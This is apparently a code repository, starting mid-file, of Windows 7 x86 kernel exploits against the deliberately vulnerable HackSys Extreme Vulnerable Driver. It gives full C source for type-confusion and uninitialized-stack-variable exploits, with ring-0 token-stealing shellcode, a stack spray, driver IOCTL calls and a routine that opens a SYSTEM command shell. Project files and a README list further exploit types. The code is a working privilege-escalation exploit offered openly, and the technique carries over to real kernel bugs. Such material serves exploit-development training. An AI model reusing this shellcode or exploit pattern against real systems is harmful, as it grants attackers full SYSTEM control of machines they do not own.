dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | "\x61" // popad ; Restore register state from the Stack 85 | "\xC3" // ret 86 | ; 87 | 88 | wprintf(L" __ __ __ ____ \n"); 89 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 90 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 91 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 92 | wprintf(L" /___/ \n"); 93 | wprintf(L" \n"); 94 | wprintf(L" Extreme Vulnerable Driver \n"); 95 | wprintf(L" Type Confusion \n\n"); 96 | 97 | // Get OS Version/Architecture 98 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 99 | 100 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 101 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 102 | if (RtlGetVersion == NULL) { 103 | wprintf(L" -> Unable to get Module handle!\n\n"); 104 | exit(1); 105 | } 106 | 107 | RtlGetVersion(&osInfo); 108 | 109 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 110 | 111 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 112 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 113 | } 114 | else { 115 | wprintf(L" [!] This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 116 | exit(1); 117 | } 118 | 119 | wprintf(L" [*] Allocating Ring0 Payload"); 120 | 121 | lpvPayload = VirtualAlloc( 122 | NULL, // Next page to commit 123 | sizeof(ShellCode), // Page size, in bytes 124 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 125 | PAGE_EXECUTE_READWRITE); // Read/write access 126 | if (lpvPayload == NULL) 127 | { 128 | wprintf(L" -> Unable to reserve Memory!\n\n"); 129 | exit(1); 130 | } 131 | 132 | wprintf(L" -> Done!\n"); 133 | 134 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 135 | 136 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 137 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 138 | 139 | hDevice = CreateFile(lpDeviceName, // Name of the write 140 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 141 | FILE_SHARE_WRITE, // Allow Share 142 | NULL, // Default security 143 | OPEN_EXISTING, // Opens a file or device, only if it exists. 144 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 145 | NULL); // No attr. template 146 | 147 | if (hDevice == INVALID_HANDLE_VALUE) 148 | { 149 | wprintf(L" -> Unable to get Driver handle!\n\n"); 150 | exit(1); 151 | } 152 | 153 | wprintf(L" -> Done!\n"); 154 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 155 | 156 | wprintf(L" [*] Preparing USER_TYPE_CONFUSION_OBJECT Structure"); 157 | 158 | // Union Member Type Confusion https://www.tutorialspoint.com/cprogramming/c_unions.htm 159 | 160 | PUSER_TYPE_CONFUSION_OBJECT pTypeConfusion; 161 | pTypeConfusion = (PUSER_TYPE_CONFUSION_OBJECT)malloc(sizeof(USER_TYPE_CONFUSION_OBJECT)); 162 | 163 | pTypeConfusion->ObjectID = 0xB03FB03F; 164 | pTypeConfusion->ObjectType = (ULONG_PTR)lpvPayload; 165 | 166 | wprintf(L" -> Done!\n"); 167 | wprintf(L" [+] USER_TYPE_CONFUSION_OBJECT available at: 0x%p \n", pTypeConfusion); 168 | wprintf(L" [+] USER_TYPE_CONFUSION_OBJECT -> ObjectType Contains: 0x%p \n\n", (LPVOID)pTypeConfusion->ObjectType); 169 | 170 | wprintf(L" [*] Lets send some Bytes to our Driver"); 171 | 172 | DWORD junk = 0; // Discard results 173 | 174 | bResult = DeviceIoControl(hDevice, // Device to be queried 175 | 0x222023, // Operation to perform 176 | pTypeConfusion, sizeof(pTypeConfusion), // Input Buffer 177 | NULL, 0, // Output Buffer 178 | &junk, // # Bytes returned 179 | (LPOVERLAPPED)NULL); // Synchronous I/O 180 | if (!bResult) { 181 | wprintf(L" -> Failed to send Data!\n\n"); 182 | CloseHandle(hDevice); 183 | exit(1); 184 | } 185 | 186 | wprintf(L" -> Done!\n\n"); 187 | 188 | BOOL isGodMode = IsSystem(); 189 | if (!isGodMode) { 190 | wprintf(L" [!] Exploit Failed :( \n\n"); 191 | CloseHandle(hDevice); 192 | exit(1); 193 | } 194 | 195 | PopShell(); 196 | wprintf(L" [!] Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 197 | 198 | CloseHandle(hDevice); 199 | 200 | return (0); 201 | } 202 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef struct _USER_TYPE_CONFUSION_OBJECT { 6 | ULONG_PTR ObjectID; 7 | ULONG_PTR ObjectType; 8 | } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; 9 | 10 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 11 | LPOSVERSIONINFOEXW lpVersionInformation 12 | ); 13 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {B45D84E0-2352-4930-A4CD-786D7943A858} 23 | HSTypeConfusion 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /HS-TypeConfusion/HS-TypeConfusion/HS-TypeConfusion.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.24720.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HS-UninitializedStackVariable", "HS-UninitializedStackVariable\HS-UninitializedStackVariable.vcxproj", "{DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x64.ActiveCfg = Debug|x64 17 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x64.Build.0 = Debug|x64 18 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x86.ActiveCfg = Debug|Win32 19 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Debug|x86.Build.0 = Debug|Win32 20 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x64.ActiveCfg = Release|x64 21 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x64.Build.0 = Release|x64 22 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x86.ActiveCfg = Release|Win32 23 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "HS-UninitializedStackVariable.h" 5 | 6 | 7 | BOOL IsSystem(VOID) 8 | { 9 | DWORD dwSize = 0, dwResult = 0; 10 | HANDLE hToken = NULL; 11 | PTOKEN_USER Ptoken_User; 12 | LPWSTR SID = NULL; 13 | 14 | // Open a handle to the access token for the calling process. 15 | if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 16 | return FALSE; 17 | } 18 | 19 | // Call GetTokenInformation to get the buffer size. 20 | if (!GetTokenInformation(hToken, TokenUser, NULL, dwSize, &dwSize)) { 21 | dwResult = GetLastError(); 22 | if (dwResult != ERROR_INSUFFICIENT_BUFFER) { 23 | return FALSE; 24 | } 25 | } 26 | 27 | // Allocate the buffer. 28 | Ptoken_User = (PTOKEN_USER)GlobalAlloc(GPTR, dwSize); 29 | 30 | // Call GetTokenInformation again to get the group information. 31 | if (!GetTokenInformation(hToken, TokenUser, Ptoken_User, dwSize, &dwSize)) { 32 | return FALSE; 33 | } 34 | if (!ConvertSidToStringSidW(Ptoken_User->User.Sid, &SID)) { 35 | return FALSE; 36 | } 37 | 38 | if (_wcsicmp(L"S-1-5-18", SID) != 0) { 39 | return FALSE; 40 | } 41 | if (Ptoken_User) GlobalFree(Ptoken_User); 42 | 43 | return TRUE; 44 | } 45 | 46 | 47 | void PopShell() 48 | { 49 | STARTUPINFO si = { sizeof(STARTUPINFO) }; 50 | PROCESS_INFORMATION pi; 51 | 52 | ZeroMemory(&si, sizeof(si)); 53 | si.cb = sizeof(si); 54 | ZeroMemory(&pi, sizeof(pi)); 55 | 56 | CreateProcess(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); 57 | 58 | } 59 | 60 | 61 | int wmain(int argc, wchar_t* argv[]) 62 | { 63 | OSVERSIONINFOEXW osInfo; 64 | TCHAR chOSMajorMinor[8]; 65 | LPVOID lpvPayload; 66 | HANDLE hDevice; 67 | LPCWSTR lpDeviceName = L"\\\\.\\HacksysExtremeVulnerableDriver"; 68 | BOOL bResult = FALSE; 69 | 70 | CHAR ShellCode[] = "\x60" // pushad ; Save register state on the Stack 71 | "\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread 72 | "\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process 73 | "\x89\xC1" // mov ecx, eax (Current _EPROCESS structure) 74 | "\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token 75 | //---[Copy System PID token] 76 | "\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System 77 | "\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink 78 | "\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET | 79 | "\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId 80 | "\x75\xED" // jnz ->| ; Loop !(PID=4) 81 | "\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token 82 | "\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token 83 | //---[Recover] 84 | "\x61" // popad ; Restore register state from the Stack 85 | "\xC3" // ret 86 | ; 87 | 88 | wprintf(L" __ __ __ ____ \n"); 89 | wprintf(L" / // /__ _____/ /__ / __/_ _____ \n"); 90 | wprintf(L" / _ / _ `/ __/ '_/_\\ \\/ // (_-< \n"); 91 | wprintf(L" /_//_/\\_,_/\\__/_/\\_\\/___/\\_, /___/ \n"); 92 | wprintf(L" /___/ \n"); 93 | wprintf(L" \n"); 94 | wprintf(L" Extreme Vulnerable Driver \n"); 95 | wprintf(L" Uninitialized Stack Variable \n\n"); 96 | 97 | // Get OS Version/Architecture 98 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 99 | 100 | _RtlGetVersion RtlGetVersion = (_RtlGetVersion) 101 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion"); 102 | if (RtlGetVersion == NULL) { 103 | wprintf(L" -> Unable to get Module handle!\n\n"); 104 | exit(1); 105 | } 106 | 107 | RtlGetVersion(&osInfo); 108 | 109 | swprintf_s(chOSMajorMinor, sizeof(chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion); 110 | 111 | if (_wcsicmp(chOSMajorMinor, L"6.1") == 0 && sizeof(LPVOID) == 4) { 112 | wprintf(L" [*] Exploit running on Windows Version: 7 or Server 2008 x86 build %u \n\n", osInfo.dwBuildNumber); 113 | } 114 | else { 115 | wprintf(L" [!] This exploit has only been tested on Windows 7 x86 build 7601 \n\n"); 116 | exit(1); 117 | } 118 | 119 | wprintf(L" [*] Allocating Ring0 Payload"); 120 | 121 | lpvPayload = VirtualAlloc( 122 | NULL, // Next page to commit 123 | sizeof(ShellCode), // Page size, in bytes 124 | MEM_COMMIT | MEM_RESERVE, // Allocate a committed page 125 | PAGE_EXECUTE_READWRITE); // Read/write access 126 | if (lpvPayload == NULL) 127 | { 128 | wprintf(L" -> Unable to reserve Memory!\n\n"); 129 | exit(1); 130 | } 131 | 132 | wprintf(L" -> Done!\n"); 133 | 134 | memcpy(lpvPayload, ShellCode, sizeof(ShellCode)); 135 | 136 | wprintf(L" [+] Ring0 Payload available at: 0x%p \n\n", lpvPayload); 137 | wprintf(L" [*] Trying to get a handle to the following Driver: %ls", lpDeviceName); 138 | 139 | hDevice = CreateFile(lpDeviceName, // Name of the write 140 | GENERIC_READ | GENERIC_WRITE, // Open for reading/writing 141 | FILE_SHARE_WRITE, // Allow Share 142 | NULL, // Default security 143 | OPEN_EXISTING, // Opens a file or device, only if it exists. 144 | FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, // Normal file 145 | NULL); // No attr. template 146 | 147 | if (hDevice == INVALID_HANDLE_VALUE) 148 | { 149 | wprintf(L" -> Unable to get Driver handle!\n\n"); 150 | exit(1); 151 | } 152 | 153 | wprintf(L" -> Done!\n"); 154 | wprintf(L" [+] Our Device Handle: 0x%p \n\n", hDevice); 155 | 156 | wprintf(L" [*] Preparing StackSpray Buffer"); 157 | 158 | /* 159 | CHAR *chStackSpray; 160 | chStackSpray = (CHAR *)malloc(8192); 161 | SecureZeroMemory(chStackSpray, 8192); 162 | for (unsigned int i = 0; i < 8192; i += 8) 163 | *(PULONG64)(chStackSpray + i) = (ULONG64)0x4141414142424242; 164 | */ 165 | 166 | CHAR *chStackSpray; 167 | chStackSpray = (CHAR *)malloc(4196); 168 | SecureZeroMemory(chStackSpray, 4196); 169 | for (unsigned int i = 0; i < 4196; i += 4) 170 | *(PULONG)(chStackSpray + i) = (ULONG)lpvPayload; 171 | 172 | wprintf(L" -> Done!\n"); 173 | wprintf(L" [+] StackSpray Buffer available at: 0x%p \n\n", chStackSpray); 174 | 175 | wprintf(L" [*] Lets spray the Stack and send the UserBuffer to our Driver"); 176 | 177 | //ULONG64 ulUserValue = 0xB03FB03F; 178 | ULONG ulUserValue = 0xB03FB03F; 179 | LPVOID lpBuffer = &ulUserValue; 180 | 181 | _NtMapUserPhysicalPages NtMapUserPhysicalPages = (_NtMapUserPhysicalPages) 182 | GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtMapUserPhysicalPages"); 183 | if (NtMapUserPhysicalPages == NULL) { 184 | wprintf(L" -> Unable to get Module handle!\n\n"); 185 | exit(1); 186 | } 187 | 188 | NtMapUserPhysicalPages(NULL, 1024, (PULONG_PTR)chStackSpray); 189 | 190 | DWORD junk = 0; // Discard results 191 | 192 | bResult = DeviceIoControl(hDevice, // Device to be queried 193 | 0x22202F, // Operation to perform 194 | lpBuffer, sizeof(lpBuffer), // Input Buffer 195 | NULL, 0, // Output Buffer 196 | &junk, // # Bytes returned 197 | (LPOVERLAPPED)NULL); // Synchronous I/O 198 | if (!bResult) { 199 | wprintf(L" -> Failed to send Data!\n\n"); 200 | CloseHandle(hDevice); 201 | exit(1); 202 | } 203 | 204 | wprintf(L" -> Done!\n\n"); 205 | 206 | BOOL isGodMode = IsSystem(); 207 | if (!isGodMode) { 208 | wprintf(L" [!] Exploit Failed :( \n\n"); 209 | CloseHandle(hDevice); 210 | exit(1); 211 | } 212 | 213 | PopShell(); 214 | wprintf(L" [!] Enjoy your Shell and Thank You for Flying Ring0 Airways ;) \n\n"); 215 | 216 | CloseHandle(hDevice); 217 | 218 | return (0); 219 | } 220 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | typedef NTSTATUS(NTAPI *_RtlGetVersion)( 6 | LPOSVERSIONINFOEXW lpVersionInformation 7 | ); 8 | 9 | typedef NTSTATUS (NTAPI *_NtMapUserPhysicalPages)( 10 | PVOID VirtualAddress, 11 | ULONG_PTR NumberOfPages, 12 | PULONG_PTR UserPfnArray 13 | ); 14 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {DD2FBB25-7CB2-4D4C-851B-43279B1E48BF} 23 | HSUninitializedStackVariable 24 | 8.1 25 | 26 | 27 | 28 | Application 29 | true 30 | v140 31 | Unicode 32 | 33 | 34 | Application 35 | false 36 | v140 37 | true 38 | Unicode 39 | 40 | 41 | Application 42 | true 43 | v140 44 | Unicode 45 | 46 | 47 | Application 48 | false 49 | v140 50 | true 51 | Unicode 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | MultiThreaded 78 | 79 | 80 | 81 | 82 | Level3 83 | Disabled 84 | true 85 | MultiThreaded 86 | 87 | 88 | 89 | 90 | Level3 91 | MaxSpeed 92 | true 93 | true 94 | true 95 | MultiThreaded 96 | 97 | 98 | true 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | MaxSpeed 106 | true 107 | true 108 | true 109 | MultiThreaded 110 | 111 | 112 | true 113 | true 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /HS-UninitializedStackVariable/HS-UninitializedStackVariable/HS-UninitializedStackVariable.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Header Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HSEVD-VariousExploits 2 | By Cn33liz 2018 3 | 4 | HackSys Extreme Vulnerable Driver - Various Windows 7 x86 Kernel Exploits 5 | 6 | * Integer Overflow 7 | * Null Pointer Dereference 8 | * TypeConfusion 9 | * Uninitialized Stack Variable 10 | --------------------------------------------------------------------------------